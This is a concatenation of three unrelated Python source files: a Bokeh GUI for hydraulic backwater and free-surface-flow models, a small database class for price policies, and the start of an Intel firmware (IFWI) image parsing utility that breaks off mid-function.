B_ehead = Div(text="<b>Export Results of Model</b>")
B_export = Button(label = 'Export Results', button_type = 'success', width = 150)
B_wd = TextInput(value = 'Backwater.csv', title = 'Enter file name for export:')
w_files_bw = Div(text = " ")
# define the update
def run_bwc_model():
_hn = float(w_hn.value)
_dx = float(w_dx.value)
_C = float(w_C.value)
_b = float(w_b.value)
_I = float(w_I.value)
_Nx = float(w_Nx.value)
_Q = w_Q.value
#run the model with the value of the interface
depth,hg,waterlevel,distance = Model(_hn,_dx,_Q,_C,_b,_I,_Nx)
R = np.zeros([len(depth),5])
R[:,0] = range(len(depth))
R[:,1] = distance
R[:,2] = depth
R[:,3] = hg
R[:,4] = waterlevel
#update the plot dimension
p.x_range.end = _Nx*_dx
p.y_range.end = 1.25*np.amax(np.array(waterlevel))
#update data source
ds_bw.data = dict(dist = distance, wl = waterlevel, z0 = hg, h = depth)
def writefile():
BackWaterOut = "myapp/results/%s" %str(B_wd.value)
w_files_bw.text = str("writing files...")
BW.createOutput(R, BackWaterOut)
w_files_bw.text = str("files saved to myapp/results")
B_export.on_click(writefile)
w_button_bw.on_click(run_bwc_model)
#%%show the GUI
par_bw_label = Div(text=" <h3> Parameters <h3>")
tbl_bw_label = Div(text="<h3> Table of Simulation Results <h3>"
"<br>"
"Note : At the time of this project, bokeh tables was unstable."
"You may need to click and scroll in the table before data appears."
,width = 1200)
wb_bw = widgetbox(par_bw_label,w_hn,w_dx,w_C,w_b,w_I,
w_Nx,w_Q,w_button_bw, B_wd, B_export, w_files_bw)
grid_bw = gridplot([ [wb_bw,p],
[tbl_bw_label],
[data_table_bw]
])
tab1 = Panel(child=grid_bw, title="BACKWATER CURVE")
# =============================================================================
dx = 20
dt = 20
lgth = 1000
TimeMAX = 100
DepthIn = 'myapp/static/data/Depth.inp'
DischargeIn = 'myapp/static/data/Discharge.inp'
Ufile = 'myapp/static/data/ubc.txt'
Dfile = 'myapp/static/data/dbc.txt'
timenew = []
hini = []
qini = []
distance = []
WL = []
hg = []
dsu = ColumnDataSource(dict(h = hini, q = qini, time = timenew))
dsm = ColumnDataSource(dict(h = hini, q = qini, time = timenew))
dsd = ColumnDataSource(dict(h = hini, q = qini, time = timenew))
dswl = ColumnDataSource(dict(dist=distance, wl = WL, hg = hg))
dsq = ColumnDataSource(dict(dist=distance, q = qini))
# setup plot
ph = figure(x_range=Range1d(0, 1), y_range=Range1d(0, 1), width = 700, height = 280, title="Longitudinal Profile (Water Depth)")
ph.line(x = 'dist', y = 'wl', source = dswl, color = 'blue', line_width=2, legend = 'Water Level')
ph.line(x = 'dist', y = 'hg', source = dswl, color = 'grey', line_width=2, legend = 'Bed Level')
ph.legend.location = "top_right"
ph.xaxis.axis_label = "Distance (m)"
ph.yaxis.axis_label = "Water Level (m)"
#ph.xaxis.major_label_orientation = pi/4
pq = figure(x_range=Range1d(0, 1), y_range=Range1d(0, 1), width = 700, height = 280, title="Longitudinal Profile (Discharge)")
pq.line(x = 'dist', y = 'q', source = dsq, color = 'red', line_width=2)
pq.xaxis.axis_label = "Distance (m)"
pq.yaxis.axis_label = "Discharge (m3/s)"
#pq.xaxis.major_label_orientation = pi/4
thu = figure(x_range=Range1d(0, 1), y_range=Range1d(0, 1), width = 500, height = 400, title="Time Series Water depth")
thu.line(x = 'time', y = 'h', source = dsu, color = 'green', legend = 'upstream')
thu.line(x = 'time', y = 'h', source = dsm, color = 'red', legend = 'mid-channel')
thu.line(x = 'time', y = 'h', source = dsd, color = 'blue', legend = 'downstream')
thu.legend.location = "top_right"
thu.xaxis.axis_label = "Time (sec)"
thu.yaxis.axis_label = "Water depth (m)"
thu.xaxis.major_label_orientation = pi/4
thd = figure(x_range=Range1d(0, 1), y_range=Range1d(0, 1), width = 500, height = 400, title="Time Series Discharge")
thd.line(x = 'time', y = 'q', source = dsu, color = 'green', legend = 'upstream')
thd.line(x = 'time', y = 'q', source = dsm, color = 'red', legend = 'mid-channel')
thd.line(x = 'time', y = 'q', source = dsd, color = 'blue', legend = 'downstream')
thd.legend.location = "top_right"
thd.xaxis.axis_label = "Time (sec)"
thd.yaxis.axis_label = "Discharge (m3/s)"
thd.xaxis.major_label_orientation = pi/4
# make the widgets
Inhead = Div(text="<h3>Input for Free Surface Flow Model<h3>")
I_dx = TextInput(value = '500', title = 'Space Interval (m)')
I_dt = TextInput(value = '500', title = 'Time step (sec)')
I_TimeMAX = TextInput(value = '86400', title="Simulation Time (sec)")
I_NMAXIts = TextInput(value = '5', title="Maximum Iteration")
I_theta = TextInput(value = '0.55', title="Theta")
I_Psi = TextInput(value = '0.5', title="Psi")
I_Beta = TextInput(value = '1.0', title="Beta")
head2 = Div(text="<i><u>Physical Parameters:</u></i>")
I_b = TextInput(value = '100', title = 'Channel Width (m)')
I_lgth = TextInput(value = '10000', title = 'Channel Length (m)')
I_Ib = TextInput(value = '0.0001', title = 'Bed Slope')
I_C = TextInput(value = '50', title = 'Chezy Coefficient')
# defining boundary condition
I_ub = Div(text="<b>Upstreame Boundary Condition</b>")
uc_type = RadioGroup(labels=["Discharge", "Water depth"], active=0)
#uc_unit = Select(title="Time unit", value="hours", options=["days", "hours", "min", "sec"])
I_db = Div(text="<br><b>Downstream Boundary Condition</b>")
dc_type = RadioGroup(labels=["Discharge", "Water depth"], active=1)
#dc_unit = Select(title="Time unit", value="hours", options=["days", "hours", "min", "sec"])
I_initial = Div(text="<br><b>Initial Condition</b>")
I_qini = TextInput(value = '315', title = 'Initial Discharge (m3/s)')
I_hini= TextInput(value = '3.0', title = 'Initial Water Depth (m)')
blank2 = Div(text="<br>")
I_run = Button(label = 'Run Model', button_type = 'success', width = 150)
I_animate = Button(label = 'Start Animation', button_type = 'success', width = 150)
I_ehead = Div(text="<b>Export Water depth and Discharge</b>")
I_export = Button(label = 'Export Results', button_type = 'success', width = 150)
I_wd = TextInput(value = 'WaterDepth.txt', title = 'Enter fine name for depth:')
I_wq = TextInput(value = 'Discharge.txt', title = 'Enter fine name for discharge:')
w_files = Div(text = " ")
# define the model
def model_sim ():
dx = int(I_dx.value)
dt = int(I_dt.value)
TimeMAX = int(I_TimeMAX.value)
NMAXIts = int(I_NMAXIts.value)
theta = float(I_theta.value)
Psi = float(I_Psi.value)
Beta = float(I_Beta.value)
b = float(I_b.value)
C = float(I_C.value)
g = 9.81
Ib = float(I_Ib.value)
lgth = int(I_lgth.value)
M = 1+int(lgth/dx)
N = 1+int(TimeMAX/dt)
if uc_type.active == 0:
UC = 'Q'
else:
UC = 'h'
Ufile = 'myapp/static/data/ubc.txt'
if dc_type.active == 0:
DC = 'Q'
else:
DC = 'h'
Dfile = 'myapp/static/data/dbc.txt'
ubc, dbc, timenew = fsf_model.readboundary (Ufile, Dfile, dt, TimeMAX)
hini, qini, distance = fsf_model.readini (DepthIn, DischargeIn, dx, lgth)
Q, h, hg, WL = fsf_model.fsfCalculation (dx, dt, TimeMAX, NMAXIts, theta, Psi, Beta, b, C, g, Ib, lgth, UC, DC, ubc, dbc, hini, qini)
#update the plot dimension
ph.x_range.end = pq.x_range.end = 1.02*lgth
ph.y_range.end = thu.y_range.end =1.25*np.amax(np.array(WL))
pq.y_range.end = thd.y_range.end = 1.25*np.amax(np.array(Q))
thu.x_range.end = thd.x_range.end = TimeMAX
dsu.data=dict(h = h[:,0], q = Q[:,0], time = timenew)
dsm.data=dict(h = h[:,int(lgth/(2*dx))], q = Q[:,int(lgth/(2*dx))], time = timenew)
dsd.data=dict(h = h[:,-1], q = Q[:,-1], time = timenew)
dswl.data=dict(dist=distance, wl = WL[0], hg = hg[0])
dsq.data=dict(dist=distance, q = Q[0])
def animation ():
for i in range (len(h)):
dswl.data=dict(dist=distance, wl = WL[i], hg = hg[0])
dsq.data=dict(dist=distance, q = Q[i])
time.sleep(0.2)
# Show the GUI
I_animate.on_click(animation)
def writefile():
DepthOut = "myapp/results/%s" %str(I_wd.value)
DischargeOut = "myapp/results/%s" %str(I_wq.value)
w_files.text = str("writing files...")
with open(DischargeOut, 'w') as fname:
# writing the heading
fname.write('Computed Discharge (Q)\n')
fname.write('Time ')
for i in range (0, M):
fname.write('Q_{:d} ' .format(i))
fname.write('\n')
with open(DepthOut, 'w') as fname:
# writing the heading
fname.write('Computed Water Depth (h)\n')
fname.write('Time ')
for i in range (0, M):
fname.write('h_{:d} ' .format(i))
fname.write('\n')
for t in range (0, N):
with open(DischargeOut, 'a') as fname:
fname.write('{:4d} ' .format(t))
for z in range (0, M):
fname.write('{:4.1f} ' .format(Q[t][z]))
fname.write('\n')
with open(DepthOut, 'a') as fname:
fname.write('{:4d} ' .format(t))
for z in range (0, M):
fname.write('{:4.1f} ' .format(h[t][z]))
fname.write('\n')
w_files.text = str("files saved to myapp/results")
# write output
I_export.on_click(writefile)
I_run.on_click(model_sim)
wb_fsf = widgetbox(I_dx, I_dt, I_TimeMAX, I_NMAXIts, I_theta, I_Psi, I_Beta, I_initial, I_qini, I_hini )
wb2_fsf = widgetbox(I_b, I_lgth,I_Ib,I_C, I_ub, uc_type, I_db, dc_type, I_run, I_animate )
col2_fsf = column(ph, pq)
export_fsf = widgetbox(I_ehead, I_wd, I_wq, I_export, w_files)
grid_fsf = gridplot ( [ [Inhead],
[wb_fsf, wb2_fsf, col2_fsf] ,
[thu, thd, export_fsf]
] )
tab3 = Panel(child=grid_fsf, title="FREE SURFACE FLOW")
'''
# ==========================================================================================================================================================
==========================================================================================================================================================
==========================================================================================================================================================
'''
#%% Home Page
home_div = Div(text="<h1 style=color:DodgerBlue;"
"font-size:50px;font-family:comic sans ms >"
"Modelling Systems Development Project<h1>",
width = 1100)
intro_div = Div(text="<h1>Introduction<h1>"
"<h3>This project combines the contents and ideas of "
"of module 5 of WSE/HI 2017-2019. It was developed using "
"python programming language and bokeh for visual interaction."
"Meet the developers"
"<h3>",
width = 1100)
img_allen = Div(text = "<img src=myapp/static/images/allen.jpg "
"style=width:240px;height:240px;>" )
desc_allen = Div(text = "<h3> Name: Colis Allen <h3>"
"Background: Computer Science"
"<br>"
"Country: Guyana (South America)"
"<br>"
"Role: Sugawara Tank Model GUI and Project Compilation")
img_dianah = Div(text = "<img src=myapp/static/images/dianah.jpg "
"style=width:240px;height:240px;>" )
desc_dianah = Div(text = "<h3> Name: Dianah Nasasira <h3>"
"Background: Civil Engineering"
"<br>"
"Country: Uganda"
"<br>"
"Role: BackWater Curve GUI and Report")
img_harsha = Div(text = "<img src=myapp/static/images/harsha.jpg "
"style=width:240px;height:240px;>" )
desc_harsha = Div(text = "<h3> Name: Harsha Abeykoon <h3>"
"Background: Civil Engineering"
"<br>"
"Country: Sri Lanka"
"<br>"
"Role: Testing and Report")
img_tanvir = Div(text = "<img src=myapp/static/images/tanvir.jpg "
"style=width:240px;height:240px;>" )
desc_tanvir = Div(text = "<h3> Name: Tanvir Ahmed <h3>"
"Background: Water Resources Engineer"
"<br>"
"Country: Bangladesh"
"<br>"
"Role: Free Surface Flow GUI and Design")
wb_home = widgetbox(home_div)
grid_home = gridplot( [ [wb_home],
[intro_div],
[img_allen , desc_allen, img_dianah, desc_dianah],
[img_harsha, desc_harsha, img_tanvir, desc_tanvir],
]
)
hometab = Panel(child = grid_home, title = "HOME")
#%% creating tabs
tabs = Tabs(tabs=[ hometab, tab1, tab2, tab3])
curdoc().add_root(tabs)
|
from management.config import config_api_setup
from management.database import Database
class Price_Policies:
"""price_policies class model."""
def __init__(self):
config, config_file = config_api_setup()
config.read(config_file)
self.db = Database(
connector=config['database']['connector'],
user=config['database']['user'],
password=config['database']['password'],
host=config['database']['host'],
database=config['database']['database'],
)
def get_all_price_policies(self):
""" Return the list of all price_policies. """
engine = self.db.engine
return None if not engine else self.db.get_price_policies()
def get_price_policy_by_id(self, price_policy_id: int = 1):
""" Return price_policy by its id. """
engine = self.db.engine
if not engine:
return None
else:
return self.db.get_price_policy_by_id(price_policy_id)
def add_price_policy(self, price_policy):
"""Get some information in argument (body, dict, tuple, ???)
And add a new price_policy
"""
engine = self.db.engine
if not engine:
return None
else:
return self.db.create_price_policy(price_policy)
def update_price_policy(self, price_policy, price_policy_id):
""" Update an price_policy given by its id. """
engine = self.db.engine
if not engine:
return None
else:
return self.db.update_price_policy(price_policy, price_policy_id)
def delete_price_policy(self, price_policy_id):
""" Delete an price_policy given by its id. """
engine = self.db.engine
if not engine:
return None
else:
return self.db.delete_price_policy(price_policy_id)
|
## @ ifwi_utility.py
#
# copyright (c) 2019, intel corporation. all rights reserved.<BR>
# SPDX-license-identifier: BSD-2-clause-patent
#
##
import sys
import os
import argparse
from ctypes import Structure, c_char, c_uint32, c_uint8, c_uint64, c_uint16, sizeof, ARRAY
sys.dont_write_bytecode = True
from CommonUtility import *
class UCODE_HEADER (Structure):
_pack_ = 1
_fields_ = [
('header_version', c_uint32),
('update_revision', c_uint32),
('date', c_uint32),
('processor_signature', c_uint32),
('checksum', c_uint32),
('loader_revision', c_uint32),
('processor_flags', c_uint32),
('data_size', c_uint32),
('total_size', c_uint32),
('reserved', ARRAY(c_uint8, 12)),
]
class FIT_ENTRY(Structure):
FIT_OFFSET = -0x40
FIT_SIGNATURE = b'_FIT_ '
_pack_ = 1
_fields_ = [
('address', c_uint64),
('size', c_uint32), # Bits[31:24] Reserved
('version', c_uint16),
('type', c_uint8), # Bit[7] = C_V
('checksum', c_uint8),
]
def set_values(self, _address, _size, _version, _type, _checksum):
self.address = _address
self.size = _size
self.version = _version
self.type = _type
self.checksum = _checksum
class BPDT_ENTRY_TYPE(Structure):
_pack_ = 1
_fields_ = [('data', c_uint16)]
BPDT_PART_VAL = {
"BpdtOemSmip" : 0,
"BpdtCseRbe" : 1,
"BpdtCseBup" : 2,
"BpdtUcode" : 3,
"BpdtIbb" : 4,
"BpdtSbpdt" : 5,
"BpdtObb" : 6,
"BpdtCseMain" : 7,
"BpdtIsh" : 8,
"BpdtCseIdlm" : 9,
"BpdtIfpOverride" : 10,
"BpdtDebugTokens" : 11,
"BpdtUfsPhyConfig" : 12,
"BpdtUfsGppLunId" : 13,
"BpdtPmc" : 14,
"BpdtIunit" : 15,
"BpdtNvmConfig" : 16,
"BpdtUepType" : 17,
"BpdtUfsRateType" : 18,
"BpdtInvalidType" : 19,
}
BPDT_PART_NAME = {v: k for k, v in BPDT_PART_VAL.items()}
def __init__(self, val=0):
self.set_value(val)
def __str__(self):
if self.value < 0 or self.value >= self.BPDT_PART_VAL['BpdtInvalidType']:
str = "BpdtInvalidType"
else:
str = self.BPDT_PART_NAME[self.value]
return str
def __int__(self):
return self.get_value()
def set_value(self, val):
self.data = val
def get_value(self):
return self.data
value = property(get_value, set_value)
class BPDT_INFO():
def __init__(self, name, offset, bpdt_offset, primary):
self.name = name
self.primary = primary
self.offset = offset
self.bpdt_offset = bpdt_offset
class BPDT_HEADER(Structure):
_pack_ = 1
_fields_ = [
('signature', c_uint32),
('desc_cnt', c_uint16),
('version', c_uint16),
('xor_sum', c_uint32),
('ifwi_ver', c_uint32),
('reserved', ARRAY(c_uint8, 8))
]
class BPDT_ENTRY(Structure):
_pack_ = 1
_fields_ = [
('type', BPDT_ENTRY_TYPE),
('flags', c_uint16),
('sub_part_offset', c_uint32),
('sub_part_size', c_uint32),
]
class SUBPART_DIR_HEADER(Structure):
_pack_ = 1
_fields_ = [
('header_marker', ARRAY(c_char, 4)),
('num_of_entries', c_uint32),
('header_version', c_uint8),
('entry_version', c_uint8),
('header_length', c_uint8),
('checksum', c_uint8),
('sub_part_name', ARRAY(c_char, 4)),
]
class SUBPART_DIR_ENTRY(Structure):
_pack_ = 1
_fields_ = [
('entry_name', ARRAY(c_char, 12)),
('entry_offset', c_uint32, 24),
('reserved1', c_uint32, 8),
('entry_size', c_uint32),
('reserved2', c_uint32),
]
class BIOS_ENTRY(Structure):
_pack_ = 1
_fields_ = [
('name', ARRAY(c_char, 4)),
('offset', c_uint32),
('length', c_uint32),
('reserved', c_uint32),
]
class SPI_DESCRIPTOR(Structure):
DESC_SIGNATURE = 0x0FF0A55A
FLASH_REGIONS = {
"descriptor" : 0x00,
"bios" : 0x04,
"txe" : 0x08,
"gbe" : 0x0c,
"pdr" : 0x10,
"dev_expansion" : 0x14,
}
_pack_ = 1
_fields_ = [
('reserved', ARRAY(c_char, 16)),
('fl_val_sig', c_uint32),
('fl_map0', c_uint32),
('fl_map1', c_uint32),
('fl_map2', c_uint32),
('remaining', ARRAY(c_char, 0x1000 - 0x20)),
]
class COMPONENT:
COMP_TYPE = {
"IFWI" : 0,
"RGN" : 1,
"BP" : 2,
"BPDT" : 3,
"PART" : 4,
"FILE" : 5,
}
def __init__(self, name, com_type, offset, length):
self.name = name
self.type = com_type
self.offset = offset
self.length = length
self.child = []
self.data = None
self.parent = None
def add_child(self, child, index = -1):
child.parent = self
if index == -1:
self.child.append (child)
else:
self.child.insert (index, child)
def set_data(self, file):
if file:
fd =open(file, 'rb')
data = bytearray(fd.read())
fd.close()
else:
data = bytearray(b'\xff' * self.length)
if self.length > len(data):
self.data = data + b'\xff' * (self.length - len(data))
else:
self.data = data[:self.length]
def get_data(self):
return self.data
class FLASH_MAP_DESC(Structure):
_pack_ = 1
_fields_ = [
('sig', ARRAY(c_char, 4)),
('flags', c_uint32),
('offset', c_uint32),
('size', c_uint32),
]
class FLASH_MAP(Structure):
FLASH_MAP_SIGNATURE = b'FLMP'
FLASH_MAP_COMPONENT_SIGNATURE = {
"STAGE1A" : "SG1A",
"STAGE1B" : "SG1B",
"STAGE2" : "SG02",
"ACM" : "ACM0",
"ACM3" : "ACM3",
"UCODE" : "UCOD",
"MRCDATA" : "MRCD",
"VARIABLE" : "VARS",
"PAYLOAD" : "PYLD",
"EPAYLOAD" : "EPLD",
"SIIPFW" : "IPFW",
"UEFIVARIABLE" : "UVAR",
"SPI_IAS1" : "IAS1",
"SPI_IAS2" : "IAS2",
"FWUPDATE" : "FWUP",
"CFGDATA" : "CNFG",
"KEYHASH" : "KEYH",
"BPM" : "_BPM",
"OEMKEY" : "OEMK",
"SBLRSVD" : "RSVD",
"EMPTY" : "EMTY",
"UNKNOWN" : "UNKN",
}
FLASH_MAP_ATTRIBUTES = {
"PRIMARY_REGION" : 0x00000000,
"BACKUP_REGION" : 0x00000001,
}
FLASH_MAP_DESC_FLAGS = {
"TOP_SWAP" : 0x00000001,
"REDUNDANT" : 0x00000002,
"NON_REDUNDANT": 0x00000004,
"NON_VOLATILE" : 0x00000008,
"COMPRESSED" : 0x00000010,
"BACKUP" : 0x00000040,
}
FLASH_MAP_REGION = {
0x00: "RGN",
0x01: "TS0",
0x41: "TS1",
0x02: "RD0",
0x42: "RD1",
0x04: "NRD",
0x08: "NVS",
}
_pack_ = 1
_fields_ = [
('sig', ARRAY(c_char, 4)),
('version', c_uint16),
('length', c_uint16),
('attributes', c_uint8),
('reserved', ARRAY(c_char, 3)),
('romsize', c_uint32),
]
def __init__(self):
self.sig = FLASH_MAP.FLASH_MAP_SIGNATURE
self.version = 1
self.romsize = 0
self.attributes = 0
self.length = sizeof(self)
self.descriptors = []
def add(self, desc):
self.descriptors.append(desc)
def finalize (self):
# Calculate size of the flash map
self.romsize = sum ([x.size for x in self.descriptors])
self.length = sizeof(self) + len(self.descriptors) * sizeof(FLASH_MAP_DESC)
class UCODE_PARSER:
@staticmethod
def dump (bin):
ucode_list = UCODE_PARSER.parse (bin)
for idx, bin in enumerate(ucode_list):
print ('Microcode %d:' % (idx + 1))
ucode_hdr = UCODE_HEADER.from_buffer(bin)
print (' Processor : %X' % (ucode_hdr.processor_signature))
print (' Revision : %X' % (ucode_hdr.update_revision))
month = (ucode_hdr.date & 0xFF000000) >> 24
day = (ucode_hdr.date & 0xFF0000) >> 16
year = ucode_hdr.date & 0xFFFF
print (' Date : %02X/%02X/%04X' % (month, day, year))
print (' Length : %X' % (ucode_hdr.total_size))
@staticmethod
def extract (bin, out_dir):
ucode_list = UCODE_PARSER.parse (bin)
for idx, bin in enumerate(ucode_list):
ucode_hdr = UCODE_HEADER.from_buffer(bin)
name = '%03d0_%08X_%08X.mcb' % (idx, ucode_hdr.processor_signature, ucode_hdr.update_revision)
path = os.path.join (out_dir, name)
gen_file_from_object (path, bin)
print ("%d microcode binaries were extraced to directory '%s' !" % (idx + 1, out_dir))
@staticmethod
def is_valid (ucode):
valid = True
ucode_hdr = UCODE_HEADER.from_buffer(ucode)
if ucode_hdr.header_version != 1:
print ('ERROR: Invalid header version !')
valid = False
if bytearray(ucode_hdr.reserved) != b'\x00' * 12:
print ('ERROR: Invalid reserved bytes !')
valid = False
if ucode_hdr.total_size % 1024 != 0:
print ('ERROR: Invalid total size !')
valid = False
data = ARRAY(c_uint32, ucode_hdr.total_size >> 2).from_buffer(ucode)
if (sum(data) & 0xffffffff) != 0:
print ('ERROR: Invalid checksum !')
valid = False
return valid
@staticmethod
def pack (ucode_files, out_file = None):
bins = bytearray()
if type(ucode_files) is type([]):
ucode_list = ucode_files
elif os.path.isdir(ucode_files):
ucode_list = [os.path.join(ucode_files, f) for f in sorted(os.listdir(ucode_files)) if f.endswith('.mcb')]
else:
return bins
for ucode in ucode_list:
bin = bytearray (get_file_data (ucode))
if UCODE_PARSER.is_valid (bin):
ucode_hdr = UCODE_HEADER.from_buffer(bin)
bins.extend (bin[:ucode_hdr.total_size])
else:
print ("Microcode file '%s' is ignored !" % ucode)
if out_file:
gen_file_from_object (out_file, bins)
return bins
@staticmethod
def parse (bin):
ucode = []
offset = 0
valid = True
while valid and (offset < len(bin)):
ucode_hdr = UCODE_HEADER.from_buffer(bin, offset)
if ucode_hdr.header_version == 0xffffffff:
break
valid = UCODE_PARSER.is_valid (bin)
if valid:
ucode.append (bytearray(bin[offset:offset+ucode_hdr.total_size]))
offset += ucode_hdr.total_size
return ucode
class IFWI_PARSER:
def __init__(self):
return
@staticmethod
def is_ifwi_image(bios_bins):
spi_desc = SPI_DESCRIPTOR.from_buffer(bios_bins)
return spi_desc.fl_val_sig == spi_desc.DESC_SIGNATURE
@staticmethod
def locate_components(root, path):
result = []
nodes = path.split('/')
if len(nodes) < 1 or root.name != nodes[0]:
return []
if len(nodes) == 1:
return [root]
for comp in root.child:
ret = IFWI_PARSER.locate_components(comp, '/'.join(nodes[1:]))
if len(ret) > 0:
result.extend(ret)
return result
@staticmethod
def locate_component(root, path):
result = IFWI_PARSER.locate_components(root, path)
if len(result) > 0:
return result[0]
else:
return None
@staticmethod
def find_components(root, name, comp_type = COMPONENT.COMP_TYPE['FILE']):
result = []
if root.type == comp_type and root.name == name:
return [root]
for comp in root.child:
ret = IFWI_PARSER.find_components(comp, name, comp_type)
if len(ret) > 0:
result.extend(ret)
return result
@staticmethod
def get_component_path (comp):
path = []
while comp:
path.append (comp.name)
comp = comp.parent
return '/'.join(path[::-1])
@staticmethod
def print_tree(root, level=0):
if root is None:
return
print ("%-24s [O:0x%08X L:0x%08X]" % (' ' * level + root.name,
root.offset, root.length))
for comp in root.child:
level += 1
IFWI_PARSER.print_tree(comp, level)
level -= 1
bp = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP0')
if bp:
print ("\nBPDT Space Information:")
for idx in range(2):
bp = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP%d' % idx)
if len(bp.child) > 1:
sbpdt = bp.child[1]
bplen = bp.length - ((sbpdt.offset + sbpdt.length) - bp.offset)
else:
bplen = bp.length
print (" BP%d Free Space: 0x%05X" % (idx, bplen))
@staticmethod
def find_ifwi_region (spi_descriptor, rgn_name):
frba = ((spi_descriptor.fl_map0 >> 16) & 0xFF) << 4
reg_off = spi_descriptor.FLASH_REGIONS[rgn_name]
fl_reg = reg_off + frba
rgn_off = c_uint32.from_buffer(spi_descriptor, fl_reg)
rgn_base = (rgn_off.value & 0x7FFF) << 12
rgn_limit = ((rgn_off.value & 0x7FFF0000) >> 4) | 0xFFF
if (reg_off > 0 and rgn_off.value == 0) or (rgn_off.value == 0xFFFFFFFF) or (rgn_limit <= rgn_base):
return None, None
else:
return (rgn_base, rgn_limit)
@staticmethod
def get_boot_partition_from_path (comp_path):
if '/RD0/' in comp_path or '/TS0/' in comp_path:
bp = 0
elif '/RD1/' in comp_path or '/TS1/' in comp_path:
bp = 1
else:
bp = 0
return bp
@staticmethod
def update_ucode_fit_entry (ifwi_bin, ucode_path):
ifwi = IFWI_PARSER.parse_ifwi_binary (ifwi_bin)
if not ifwi:
print ("Not a valid ifwi image!")
return -2
# Get microcode
ucode_comps = IFWI_PARSER.locate_components (ifwi, ucode_path)
if len(ucode_comps) == 0:
print ("Cannot find microcode component in ifwi image!" % path)
return -3
# Get partition from path
bp = IFWI_PARSER.get_boot_partition_from_path (ucode_path)
# Get fit entry
path = 'IFWI/BIOS/TS%d/SG1A' % bp
ifwi_comps = IFWI_PARSER.locate_components (ifwi, path)
if len(ifwi_comps) == 0:
path = 'IFWI/BIOS/SG1A' % bp
ifwi_comps = IFWI_PARSER.locate_components (ifwi, path)
if len(ifwi_comps) == 0:
print ("Cannot find 'SG1A' in ifwi image!" % path)
return -4
img_base = 0x100000000 - len(ifwi_bin)
fit_addr = c_uint32.from_buffer(ifwi_bin, ifwi_comps[0].offset + ifwi_comps[0].length + FIT_ENTRY.FIT_OFFSET)
fit_offset = fit_addr.value - img_base
fit_header = FIT_ENTRY.from_buffer(ifwi_bin, fit_offset)
if fit_header.address != bytes_to_value (bytearray(FIT_ENTRY.FIT_SIGNATURE)):
print ("Cannot find FIT table !" % path)
return -4
# Update Ucode entry address
ucode_idx = 0
ucode_off = ucode_comps[0].offset
ucode_list = UCODE_PARSER.parse (ifwi_bin[ucode_off:])
for fit_type in [0x01, 0x7f]:
for idx in range(fit_header.size):
fit_entry = FIT_ENTRY.from_buffer(ifwi_bin, fit_offset + (idx + 1) * 16)
if fit_entry.type == fit_type:
if ucode_idx < len(ucode_list):
fit_entry.set_values(img_base + ucode_off, 0, 0x100, 0x1, 0)
ucode_off += len(ucode_list[ucode_idx])
ucode_idx += 1
else:
# more fit entry is available, clear this entry
fit_entry.type = 0x7f
if ucode_idx != len(ucode_list):
print ("Not all microcode can be listed in FIT table due to limited FIT entry number !")
return -5
# Update FIT checksum
fit_header.checksum = 0
fit_sum = sum(ifwi_bin[fit_offset:fit_offset+fit_header.size*16])
fit_header.checksum = (0 - fit_sum) & 0xff
return 0
@staticmethod
def replace_component (ifwi_bin, comp_bin, path):
ifwi = IFWI_PARSER.parse_ifwi_binary (ifwi_bin)
if not ifwi:
print ("Not a valid ifwi image!")
return -2
ifwi_comps = IFWI_PARSER.locate_components (ifwi, path)
if len(ifwi_comps) == 0:
print ("Cannot find path '%s' in ifwi image!" % path)
return -4
for ifwi_comp in ifwi_comps:
gap = len(comp_bin) - ifwi_comp.length
if gap > 0:
print ("Component image file is too big (0x%x vs 0x%x)!" % (ifwi_comp.length, len(comp_bin)))
return -5
elif gap < 0:
gap = -gap
print ("Padding 0x%x bytes at the end to fill the region '%s'" % (gap, ifwi_comp.name))
comp_bin.extend (b'\xff' * gap)
ifwi_bin[ifwi_comp.offset:ifwi_comp.offset + ifwi_comp.length] = \
comp_bin[0:ifwi_comp.length]
return 0
@staticmethod
def extract_component (ifwi_bin, comp_bin, path):
bins_comp = bytearray ()
ifwi = IFWI_PARSER.parse_ifwi_binary (ifwi_bin)
if not ifwi:
print ("Not a valid ifwi image!")
return -1
ifwi_comps = IFWI_PARSER.locate_components (ifwi, path)
if len(ifwi_comps) == 0:
print ("Cannot find path '%s' in ifwi image!" % path)
return -2
if len(ifwi_comps) > 1:
print ("Found multiple components for '%s'!" % path)
return -3
ifwi_comp = ifwi_comps[0]
comp_bin[:] = ifwi_bin[ifwi_comp.offset:ifwi_comp.offset + ifwi_comp.length]
return 0
@staticmethod
def bpdt_parser (bin_data, bpdt_offset, offset):
sub_part_list = []
idx = bpdt_offset + offset
bpdt_hdr = BPDT_HEADER.from_buffer(bytearray(bin_data[idx:idx + sizeof(BPDT_HEADER)]))
idx += sizeof(bpdt_hdr)
sbpdt = None
for desc in range(bpdt_hdr.desc_cnt):
bpdt_entry = BPDT_ENTRY.from_buffer(bytearray(bin_data[idx:idx + sizeof(BPDT_ENTRY)]))
idx += sizeof(bpdt_entry)
dir_list = []
if 'BpdtSbpdt' == str(bpdt_entry.type):
sbpdt = bpdt_entry
if bpdt_entry.sub_part_size > sizeof(SUBPART_DIR_HEADER):
part_idx = bpdt_offset + bpdt_entry.sub_part_offset
if part_idx > len(bin_data):
break
sub_part_dir_hdr = SUBPART_DIR_HEADER.from_buffer(
bytearray(bin_data[part_idx:part_idx + sizeof(
SUBPART_DIR_HEADER)]), 0)
part_idx += sizeof(sub_part_dir_hdr)
if b'$CPD' == sub_part_dir_hdr.header_marker:
for dir in range(sub_part_dir_hdr.num_of_entries):
part_dir = SUBPART_DIR_ENTRY.from_buffer(
bytearray(bin_data[part_idx:part_idx + sizeof(
SUBPART_DIR_ENTRY)]), 0)
part_idx += sizeof(part_dir)
dir_list.append(part_dir)
sub_part_list.append((bpdt_entry, dir_list))
return sub_part_list, sbpdt
@staticmethod
def parse_bios_bpdt (img_data):
offset = 0
bios_hdr = BIOS_ENTRY.from_buffer(img_data, offset)
if bios_hdr.name != "BIOS":
return None
bios_comp = COMPONENT(bios_hdr.name, COMPONENT.COMP_TYPE['RGN'], 0, len(img_data))
offset += sizeof(bios_hdr)
entry_num = bios_hdr.offset
for idx in range(entry_num):
part_entry = BIOS_ENTRY.from_buffer(img_data, offset)
part_comp = COMPONENT(part_entry.name, COMPONENT.COMP_TYPE['PART'],
part_entry.offset, part_entry.length)
bios_comp.add_child(part_comp)
sub_part_dir_hdr = SUBPART_DIR_HEADER.from_buffer(img_data,
part_entry.offset)
if b'$CPD' == sub_part_dir_hdr.header_marker:
